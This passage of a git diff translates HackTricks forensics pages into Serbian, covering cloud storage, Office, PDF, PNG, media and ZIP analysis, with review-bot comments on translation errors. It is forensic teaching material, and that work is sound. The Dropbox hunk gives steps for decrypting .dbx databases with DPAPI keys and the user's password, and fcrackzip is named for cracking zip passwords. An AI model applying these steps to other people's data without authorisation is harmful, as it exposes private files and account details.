+Opera podaci se nalaze u `/Users/$USER/Library/Application Support/com.operasoftware.Opera` i deli format sa Chrome-om za istoriju i preuzimanja. -- **Browser’s built-in anti-phishing**: Verify by checking if `fraud_protection_enabled` in the Preferences file is set to `true` using `grep`. +- **Browser’s built-in anti-phishing**: Proverite tako što ćete videti da li je `fraud_protection_enabled` u datoteci Preferences postavljeno na `true` koristeći `grep`. -These paths and commands are crucial for accessing and understanding the browsing data stored by different web browsers. +Ove putanje i komande su ključne za pristup i razumevanje podataka o pretraživanju koje čuvaju različiti web pretraživači. ## References @@ -169,12 +159,4 @@ These paths and commands are crucial for accessing and understanding the browsin - [https://books.google.com/books?id=jfMqCgAAQBAJ\&pg=PA128\&lpg=PA128\&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file) - **Book: OS X Incident Response: Scripting and Analysis By Jaron Bradley pag 123** -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index c22a6f566..ab6437275 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md 
@@ -1,50 +1,42 @@ {{#include ../../../banners/hacktricks-training.md}} -Some things that could be useful to debug/deobfuscate a malicious VBS file: +Neke stvari koje bi mogle biti korisne za debagovanje/deobfuskaciju zlonamernog VBS fajla: ## echo - ```bash Wscript.Echo "Like this?" ``` - -## Commnets - +## Komentari ```bash ' this is a comment ``` - ## Test - ```bash cscript.exe file.vbs ``` - -## Write data to a file - +## Napišite podatke u datoteku ```js Function writeBinary(strBinary, strPath) - Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject") +Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject") - ' below lines purpose: checks that write access is possible! - Dim oTxtStream +' below lines purpose: checks that write access is possible! +Dim oTxtStream - On Error Resume Next - Set oTxtStream = oFSO.createTextFile(strPath) +On Error Resume Next +Set oTxtStream = oFSO.createTextFile(strPath) - If Err.number <> 0 Then MsgBox(Err.message) : Exit Function - On Error GoTo 0 +If Err.number <> 0 Then MsgBox(Err.message) : Exit Function +On Error GoTo 0 - Set oTxtStream = Nothing - ' end check of write access +Set oTxtStream = Nothing +' end check of write access - With oFSO.createTextFile(strPath) - .Write(strBinary) - .Close - End With +With oFSO.createTextFile(strPath) +.Write(strBinary) +.Close +End With End Function ``` - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md index 99792162b..2c690925e 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md 
@@ -1,114 +1,97 @@ -# Local Cloud Storage +# Lokalna Cloud Skladišta {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} ## OneDrive -In Windows, you can find the OneDrive folder in `\Users\\AppData\Local\Microsoft\OneDrive`. And inside `logs\Personal` it's possible to find the file `SyncDiagnostics.log` which contains some interesting data regarding the synchronized files: +U Windows-u, možete pronaći OneDrive folder u `\Users\\AppData\Local\Microsoft\OneDrive`. I unutar `logs\Personal` moguće je pronaći datoteku `SyncDiagnostics.log` koja sadrži neke zanimljive podatke o sinhronizovanim datotekama: -- Size in bytes -- Creation date -- Modification date -- Number of files in the cloud -- Number of files in the folder -- **CID**: Unique ID of the OneDrive user -- Report generation time -- Size of the HD of the OS +- Veličina u bajtovima +- Datum kreiranja +- Datum modifikacije +- Broj datoteka u cloudu +- Broj datoteka u folderu +- **CID**: Jedinstveni ID OneDrive korisnika +- Vreme generisanja izveštaja +- Veličina HD operativnog sistema -Once you have found the CID it's recommended to **search files containing this ID**. You may be able to find files with the name: _**\.ini**_ and _**\.dat**_ that may contain interesting information like the names of files synchronized with OneDrive. +Kada pronađete CID, preporučuje se da **pretražujete datoteke koje sadrže ovaj ID**. Možda ćete moći da pronađete datoteke sa imenom: _**\.ini**_ i _**\.dat**_ koje mogu sadržati zanimljive informacije kao što su imena datoteka sinhronizovanih sa OneDrive-om. 
## Google Drive -In Windows, you can find the main Google Drive folder in `\Users\\AppData\Local\Google\Drive\user_default`\ -This folder contains a file called Sync_log.log with information like the email address of the account, filenames, timestamps, MD5 hashes of the files, etc. Even deleted files appear in that log file with its corresponding MD5. +U Windows-u, možete pronaći glavni Google Drive folder u `\Users\\AppData\Local\Google\Drive\user_default`\ +Ovaj folder sadrži datoteku pod nazivom Sync_log.log sa informacijama kao što su email adresa naloga, imena datoteka, vremenski oznake, MD5 heševi datoteka, itd. Čak i obrisane datoteke se pojavljuju u toj log datoteci sa svojim odgovarajućim MD5. -The file **`Cloud_graph\Cloud_graph.db`** is a sqlite database which contains the table **`cloud_graph_entry`**. In this table you can find the **name** of the **synchronized** **files**, modified time, size, and the MD5 checksum of the files. +Datoteka **`Cloud_graph\Cloud_graph.db`** je sqlite baza podataka koja sadrži tabelu **`cloud_graph_entry`**. U ovoj tabeli možete pronaći **ime** **sinhronizovanih** **datoteka**, vreme modifikacije, veličinu i MD5 kontrolni zbir datoteka. -The table data of the database **`Sync_config.db`** contains the email address of the account, the path of the shared folders and the Google Drive version. +Podaci tabele baze podataka **`Sync_config.db`** sadrže email adresu naloga, putanju deljenih foldera i verziju Google Drive-a. ## Dropbox -Dropbox uses **SQLite databases** to manage the files. In this\ -You can find the databases in the folders: +Dropbox koristi **SQLite baze podataka** za upravljanje datotekama. 
U ovom\ +Možete pronaći baze podataka u folderima: - `\Users\\AppData\Local\Dropbox` - `\Users\\AppData\Local\Dropbox\Instance1` - `\Users\\AppData\Roaming\Dropbox` -And the main databases are: +A glavne baze podataka su: - Sigstore.dbx - Filecache.dbx - Deleted.dbx - Config.dbx -The ".dbx" extension means that the **databases** are **encrypted**. Dropbox uses **DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN]()) +Ekstenzija ".dbx" znači da su **baze podataka** **enkriptovane**. Dropbox koristi **DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN]()) -To understand better the encryption that Dropbox uses you can read [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html). +Da biste bolje razumeli enkripciju koju Dropbox koristi, možete pročitati [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html). 
-However, the main information is: +Međutim, glavne informacije su: -- **Entropy**: d114a55212655f74bd772e37e64aee9b -- **Salt**: 0D638C092E8B82FC452883F95F355B8E -- **Algorithm**: PBKDF2 -- **Iterations**: 1066 +- **Entropija**: d114a55212655f74bd772e37e64aee9b +- **So**: 0D638C092E8B82FC452883F95F355B8E +- **Algoritam**: PBKDF2 +- **Iteracije**: 1066 -Apart from that information, to decrypt the databases you still need: +Pored tih informacija, da biste dekriptovali baze podataka, još uvek vam je potrebna: -- The **encrypted DPAPI key**: You can find it in the registry inside `NTUSER.DAT\Software\Dropbox\ks\client` (export this data as binary) -- The **`SYSTEM`** and **`SECURITY`** hives -- The **DPAPI master keys**: Which can be found in `\Users\\AppData\Roaming\Microsoft\Protect` -- The **username** and **password** of the Windows user +- **enkriptovana DPAPI ključ**: Možete ga pronaći u registru unutar `NTUSER.DAT\Software\Dropbox\ks\client` (izvezite ove podatke kao binarne) +- **`SYSTEM`** i **`SECURITY`** hives +- **DPAPI master ključevi**: Koji se mogu pronaći u `\Users\\AppData\Roaming\Microsoft\Protect` +- **korisničko ime** i **lozinka** Windows korisnika -Then you can use the tool [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi_data_decryptor.html)**:** +Zatim možete koristiti alat [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi_data_decryptor.html)**:** ![](<../../../images/image (448).png>) -If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber_chef receipt]() putting the primary key as the "passphrase" inside the receipt. - -The resulting hex is the final key used to encrypt the databases which can be decrypted with: +Ako sve prođe kako se očekuje, alat će označiti **primarni ključ** koji treba da **koristite za oporavak originalnog**. 
Da biste povratili originalni, jednostavno koristite ovaj [cyber_chef recept]() stavljajući primarni ključ kao "lozinku" unutar recepta. +Rezultantni heksadecimalni broj je konačni ključ koji se koristi za enkripciju baza podataka koje se mogu dekriptovati sa: ```bash sqlite -k config.dbx ".backup config.db" #This decompress the config.dbx and creates a clear text backup in config.db ``` +Baza podataka **`config.dbx`** sadrži: -The **`config.dbx`** database contains: +- **Email**: Email korisnika +- **usernamedisplayname**: Ime korisnika +- **dropbox_path**: Putanja gde se nalazi dropbox folder +- **Host_id: Hash** korišćen za autentifikaciju u cloud. Ovo se može opozvati samo sa veba. +- **Root_ns**: Identifikator korisnika -- **Email**: The email of the user -- **usernamedisplayname**: The name of the user -- **dropbox_path**: Path where the dropbox folder is located -- **Host_id: Hash** used to authenticate to the cloud. This can only be revoked from the web. -- **Root_ns**: User identifier +Baza podataka **`filecache.db`** sadrži informacije o svim datotekama i folderima sinhronizovanim sa Dropbox-om. Tabela `File_journal` je ona sa više korisnih informacija: -The **`filecache.db`** database contains information about all the files and folders synchronized with Dropbox. The table `File_journal` is the one with more useful information: +- **Server_path**: Putanja gde se datoteka nalazi unutar servera (ova putanja je prethodna sa `host_id` klijenta). +- **local_sjid**: Verzija datoteke +- **local_mtime**: Datum modifikacije +- **local_ctime**: Datum kreiranja -- **Server_path**: Path where the file is located inside the server (this path is preceded by the `host_id` of the client). 
-- **local_sjid**: Version of the file -- **local_mtime**: Modification date -- **local_ctime**: Creation date +Ostale tabele unutar ove baze sadrže zanimljivije informacije: -Other tables inside this database contain more interesting information: - -- **block_cache**: hash of all the files and folders of Dropbox -- **block_ref**: Related the hash ID of the table `block_cache` with the file ID in the table `file_journal` -- **mount_table**: Share folders of dropbox -- **deleted_fields**: Dropbox deleted files +- **block_cache**: hash svih datoteka i foldera Dropbox-a +- **block_ref**: Povezuje hash ID tabele `block_cache` sa ID datoteke u tabeli `file_journal` +- **mount_table**: Deljeni folderi Dropbox-a +- **deleted_fields**: Obrišene datoteke Dropbox-a - **date_added** -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md index 34433ce87..f736ecd16 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md @@ -1,36 +1,18 @@ -# Office file analysis +# Analiza Office datoteka {{#include ../../../banners/hacktricks-training.md}} -
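Review bot: in the local-cloud-storage hunk the Dropbox paragraph reproduces the dangling fragment from the English source, `+Dropbox koristi **SQLite baze podataka** za upravljanje datotekama. U ovom\` followed by `+Možete pronaći baze podataka u folderima:`; "U ovom\" is a leftover sentence stub and should be dropped rather than translated. Several agreement and meaning errors also need fixing in this hunk: `+- **enkriptovana DPAPI ključ**` should be "enkriptovani DPAPI ključ" (ključ is masculine) and the lead-in `još uvek vam je potrebna:` should be plural ("još uvek su vam potrebni:") since it introduces a list; "vremenski oznake" should be "vremenske oznake"; `+- **deleted_fields**: Obrišene datoteke Dropbox-a` should be "Obrisane"; `(ova putanja je prethodna sa `host_id` klijenta)` mistranslates "this path is preceded by the host_id of the client" and should read "ispred ove putanje stoji `host_id` klijenta"; and "Ostale tabele ... sadrže zanimljivije informacije" turns "more interesting information" into a comparative, "sadrže još zanimljivih informacija" keeps the intended sense.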
+Za više informacija proverite [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). Ovo je samo sažetak: -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Microsoft je kreirao mnoge formate office dokumenata, pri čemu su dva glavna tipa **OLE formati** (kao što su RTF, DOC, XLS, PPT) i **Office Open XML (OOXML) formati** (kao što su DOCX, XLSX, PPTX). Ovi formati mogu uključivati makroe, što ih čini metama za phishing i malver. OOXML datoteke su strukturirane kao zip kontejneri, što omogućava inspekciju kroz raspakivanje, otkrivajući hijerarhiju datoteka i foldera i sadržaj XML datoteka. -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} +Da bi se istražile strukture OOXML datoteka, data je komanda za raspakivanje dokumenta i struktura izlaza. Tehnike za skrivanje podataka u ovim datotekama su dokumentovane, što ukazuje na kontinuiranu inovaciju u skrivanju podataka unutar CTF izazova. -For further information check [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). This is just a sumary: - -Microsoft has created many office document formats, with two main types being **OLE formats** (like RTF, DOC, XLS, PPT) and **Office Open XML (OOXML) formats** (such as DOCX, XLSX, PPTX). These formats can include macros, making them targets for phishing and malware. OOXML files are structured as zip containers, allowing inspection through unzipping, revealing the file and folder hierarchy and XML file contents. - -To explore OOXML file structures, the command to unzip a document and the output structure are given. Techniques for hiding data in these files have been documented, indicating ongoing innovation in data concealment within CTF challenges. 
- -For analysis, **oletools** and **OfficeDissector** offer comprehensive toolsets for examining both OLE and OOXML documents. These tools help in identifying and analyzing embedded macros, which often serve as vectors for malware delivery, typically downloading and executing additional malicious payloads. Analysis of VBA macros can be conducted without Microsoft Office by utilizing Libre Office, which allows for debugging with breakpoints and watch variables. - -Installation and usage of **oletools** are straightforward, with commands provided for installing via pip and extracting macros from documents. Automatic execution of macros is triggered by functions like `AutoOpen`, `AutoExec`, or `Document_Open`. +Za analizu, **oletools** i **OfficeDissector** nude sveobuhvatne alate za ispitivanje kako OLE tako i OOXML dokumenata. Ovi alati pomažu u identifikaciji i analizi ugrađenih makroa, koji često služe kao vektori za isporuku malvera, obično preuzimajući i izvršavajući dodatne zlonamerne pakete. Analiza VBA makroa može se izvršiti bez Microsoft Office-a korišćenjem Libre Office-a, koji omogućava debagovanje sa tačkama prekida i posmatranim promenljivama. +Instalacija i korišćenje **oletools** su jednostavni, sa komandama za instalaciju putem pip-a i vađenje makroa iz dokumenata. Automatsko izvršavanje makroa se pokreće funkcijama kao što su `AutoOpen`, `AutoExec` ili `Document_Open`. ```bash sudo pip3 install -U oletools olevba -c /path/to/document #Extract macros ``` - -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md index 79799f2d8..f6e2bae42 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md @@ -1,28 +1,20 @@ -# PDF File analysis +# PDF analiza {{#include ../../../banners/hacktricks-training.md}} -
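Review bot: in the office-file-analysis hunk, `obično preuzimajući i izvršavajući dodatne zlonamerne pakete` renders "malicious payloads" as "packages", which changes the meaning (a payload is not a software package); "dodatne zlonamerne sadržaje (payloads)" keeps the term recognisable to readers who follow the linked English references. The rest of the hunk is fine, including the fix of the source's "sumary" typo.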
+**Za više detalja proverite:** [**https://trailofbits.github.io/ctf/forensics/**](https://trailofbits.github.io/ctf/forensics/) -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +PDF format je poznat po svojoj složenosti i potencijalu za prikrivanje podataka, što ga čini centralnom tačkom za CTF forenzičke izazove. Kombinuje elemente običnog teksta sa binarnim objektima, koji mogu biti kompresovani ili enkriptovani, i može uključivati skripte u jezicima kao što su JavaScript ili Flash. Da bi se razumeo PDF struktura, može se konsultovati [uvodni materijal](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/) Didiera Stevensa, ili koristiti alate kao što su tekstualni editor ili PDF-specifični editor kao što je Origami. -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} +Za dubinsko istraživanje ili manipulaciju PDF-ova, dostupni su alati kao što su [qpdf](https://github.com/qpdf/qpdf) i [Origami](https://github.com/mobmewireless/origami-pdf). Sakriveni podaci unutar PDF-ova mogu biti prikriveni u: -**For further details check:** [**https://trailofbits.github.io/ctf/forensics/**](https://trailofbits.github.io/ctf/forensics/) +- Nevidljivim slojevima +- XMP metapodacima formata od Adobe-a +- Inkrementalnim generacijama +- Tekstu iste boje kao pozadina +- Tekstu iza slika ili preklapajućih slika +- Neprikazanim komentarima -The PDF format is known for its complexity and potential for concealing data, making it a focal point for CTF forensics challenges. It combines plain-text elements with binary objects, which might be compressed or encrypted, and can include scripts in languages like JavaScript or Flash. 
To understand PDF structure, one can refer to Didier Stevens's [introductory material](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), or use tools like a text editor or a PDF-specific editor such as Origami. - -For in-depth exploration or manipulation of PDFs, tools like [qpdf](https://github.com/qpdf/qpdf) and [Origami](https://github.com/mobmewireless/origami-pdf) are available. Hidden data within PDFs might be concealed in: - -- Invisible layers -- XMP metadata format by Adobe -- Incremental generations -- Text with the same color as the background -- Text behind images or overlapping images -- Non-displayed comments - -For custom PDF analysis, Python libraries like [PeepDF](https://github.com/jesparza/peepdf) can be used to craft bespoke parsing scripts. Further, the PDF's potential for hidden data storage is so vast that resources like the NSA guide on PDF risks and countermeasures, though no longer hosted at its original location, still offer valuable insights. A [copy of the guide](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) and a collection of [PDF format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) by Ange Albertini can provide further reading on the subject. +Za prilagođenu analizu PDF-a, Python biblioteke kao što su [PeepDF](https://github.com/jesparza/peepdf) mogu se koristiti za izradu specijalizovanih skripti za parsiranje. Pored toga, potencijal PDF-a za skladištenje skrivenih podataka je toliko ogroman da resursi poput NSA vodiča o rizicima i protivmera vezanim za PDF, iako više nisu dostupni na svojoj originalnoj lokaciji, i dalje nude dragocene uvide. 
[Kopija vodiča](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) i kolekcija [trikova za PDF format](https://github.com/corkami/docs/blob/master/PDF/PDF.md) od Ange Albertinija mogu pružiti dodatno čitanje o ovoj temi. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index 6108df028..d341f989e 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md 
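Review bot: in the pdf-file-analysis hunk two case/gender agreement errors should be corrected: `Da bi se razumeo PDF struktura` should be "Da bi se razumela struktura PDF-a", and `NSA vodiča o rizicima i protivmera vezanim za PDF` should be "o rizicima i protivmerama vezanim za PDF" (both nouns are governed by "o" and take the locative).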
@@ -1,9 +1,9 @@ {{#include ../../../banners/hacktricks-training.md}} -**PNG files** are highly regarded in **CTF challenges** for their **lossless compression**, making them ideal for embedding hidden data. Tools like **Wireshark** enable the analysis of PNG files by dissecting their data within network packets, revealing embedded information or anomalies. +**PNG fajlovi** su veoma cenjeni u **CTF izazovima** zbog svoje **bezgubitne kompresije**, što ih čini idealnim za ugrađivanje skrivenih podataka. Alati poput **Wireshark** omogućavaju analizu PNG fajlova razlažući njihove podatke unutar mrežnih paketa, otkrivajući ugrađene informacije ili anomalije. -For checking PNG file integrity and repairing corruption, **pngcheck** is a crucial tool, offering command-line functionality to validate and diagnose PNG files ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). When files are beyond simple fixes, online services like [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) provide a web-based solution for **repairing corrupted PNGs**, aiding in the recovery of crucial data for CTF participants. +Za proveru integriteta PNG fajlova i popravku oštećenja, **pngcheck** je ključni alat, koji nudi funkcionalnost putem komandne linije za validaciju i dijagnostiku PNG fajlova ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Kada su fajlovi izvan jednostavnih popravki, online usluge poput [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) pružaju web-rešenje za **popravku oštećenih PNG-ova**, pomažući u oporavku ključnih podataka za učesnike CTF-a. -These strategies underscore the importance of a comprehensive approach in CTFs, utilizing a blend of analytical tools and repair techniques to uncover and recover hidden or lost data. 
+Ove strategije naglašavaju važnost sveobuhvatnog pristupa u CTF-ima, koristeći kombinaciju analitičkih alata i tehnika popravke za otkrivanje i oporavak skrivenih ili izgubljenih podataka. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index a1e143cb0..d0e581694 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -1,29 +1,17 @@ {{#include ../../../banners/hacktricks-training.md}} -
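Review bot: in the png-tricks hunk `zbog svoje **bezgubitne kompresije**` is a word-for-word calque of "lossless compression"; the established Serbian term is "kompresija bez gubitaka", so "zbog svoje **kompresije bez gubitaka**" reads naturally and keeps the emphasis.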
+**Manipulacija audio i video fajlovima** je osnovna komponenta u **CTF forenzičkim izazovima**, koristeći **steganografiju** i analizu metapodataka za skrivanje ili otkrivanje tajnih poruka. Alati kao što su **[mediainfo](https://mediaarea.net/en/MediaInfo)** i **`exiftool`** su neophodni za inspekciju metapodataka fajlova i identifikaciju tipova sadržaja. -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: +Za audio izazove, **[Audacity](http://www.audacityteam.org/)** se izdvaja kao vrhunski alat za pregled talasnih oblika i analizu spektrograma, što je ključno za otkrivanje teksta kodiranog u audio. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** se toplo preporučuje za detaljnu analizu spektrograma. **Audacity** omogućava manipulaciju audio sadržajem kao što su usporavanje ili preokretanje pesama kako bi se otkrile skrivene poruke. **[Sox](http://sox.sourceforge.net/)**, alat za komandnu liniju, odlično se snalazi u konvertovanju i uređivanju audio fajlova. -{% embed url="https://academy.8ksec.io/" %} +**Manipulacija najmanje značajnim bitovima (LSB)** je uobičajena tehnika u audio i video steganografiji, koristeći fiksne veličine delova medijskih fajlova za diskretno umetanje podataka. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** je koristan za dekodiranje poruka skrivenih kao **DTMF tonovi** ili **Morseova azbuka**. -**Audio and video file manipulation** is a staple in **CTF forensics challenges**, leveraging **steganography** and metadata analysis to hide or reveal secret messages. Tools such as **[mediainfo](https://mediaarea.net/en/MediaInfo)** and **`exiftool`** are essential for inspecting file metadata and identifying content types. +Video izazovi često uključuju kontejnerske formate koji kombinuju audio i video tokove. 
**[FFmpeg](http://ffmpeg.org/)** je alat koji se koristi za analizu i manipulaciju ovim formatima, sposoban za de-multiplexing i reprodukciju sadržaja. Za programere, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** integriše FFmpeg-ove mogućnosti u Python za napredne skriptabilne interakcije. -For audio challenges, **[Audacity](http://www.audacityteam.org/)** stands out as a premier tool for viewing waveforms and analyzing spectrograms, essential for uncovering text encoded in audio. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** is highly recommended for detailed spectrogram analysis. **Audacity** allows for audio manipulation like slowing down or reversing tracks to detect hidden messages. **[Sox](http://sox.sourceforge.net/)**, a command-line utility, excels in converting and editing audio files. - -**Least Significant Bits (LSB)** manipulation is a common technique in audio and video steganography, exploiting the fixed-size chunks of media files to embed data discreetly. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** is useful for decoding messages hidden as **DTMF tones** or **Morse code**. - -Video challenges often involve container formats that bundle audio and video streams. **[FFmpeg](http://ffmpeg.org/)** is the go-to for analyzing and manipulating these formats, capable of de-multiplexing and playing back content. For developers, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** integrates FFmpeg's capabilities into Python for advanced scriptable interactions. - -This array of tools underscores the versatility required in CTF challenges, where participants must employ a broad spectrum of analysis and manipulation techniques to uncover hidden data within audio and video files. +Ova paleta alata naglašava svestranost potrebnu u CTF izazovima, gde učesnici moraju koristiti širok spektar tehnika analize i manipulacije kako bi otkrili skrivene podatke unutar audio i video fajlova. 
## References - [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index d4e17eb0d..b81a13986 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md 
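Review bot: in the video-and-audio-file-analysis hunk `**Morseova azbuka**` should be "Morzeova azbuka" (the standard Serbian transcription of Morse), and `otkrivanje teksta kodiranog u audio` leaves "audio" undeclined; "kodiranog u audio zapisu" matches how the same hunk handles "audio fajlovi" elsewhere.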
@@ -1,20 +1,20 @@ -# ZIPs tricks +# ZIPs trikovi {{#include ../../../banners/hacktricks-training.md}} -**Command-line tools** for managing **zip files** are essential for diagnosing, repairing, and cracking zip files. Here are some key utilities: +**Alatke za komandnu liniju** za upravljanje **zip datotekama** su neophodne za dijagnostikovanje, popravku i probijanje zip datoteka. Evo nekoliko ključnih alata: -- **`unzip`**: Reveals why a zip file may not decompress. -- **`zipdetails -v`**: Offers detailed analysis of zip file format fields. -- **`zipinfo`**: Lists contents of a zip file without extracting them. -- **`zip -F input.zip --out output.zip`** and **`zip -FF input.zip --out output.zip`**: Try to repair corrupted zip files. -- **[fcrackzip](https://github.com/hyc/fcrackzip)**: A tool for brute-force cracking of zip passwords, effective for passwords up to around 7 characters. +- **`unzip`**: Otkriva zašto zip datoteka možda ne može da se raspakuje. +- **`zipdetails -v`**: Pruža detaljnu analizu polja formata zip datoteke. +- **`zipinfo`**: Navodi sadržaj zip datoteke bez vađenja. +- **`zip -F input.zip --out output.zip`** i **`zip -FF input.zip --out output.zip`**: Pokušavaju da poprave oštećene zip datoteke. +- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Alat za brute-force probijanje zip lozinki, efikasan za lozinke do oko 7 karaktera. -The [Zip file format specification](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) provides comprehensive details on the structure and standards of zip files. +[Specifikacija formata zip datoteka](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) pruža sveobuhvatne detalje o strukturi i standardima zip datoteka. -It's crucial to note that password-protected zip files **do not encrypt filenames or file sizes** within, a security flaw not shared with RAR or 7z files which encrypt this information. 
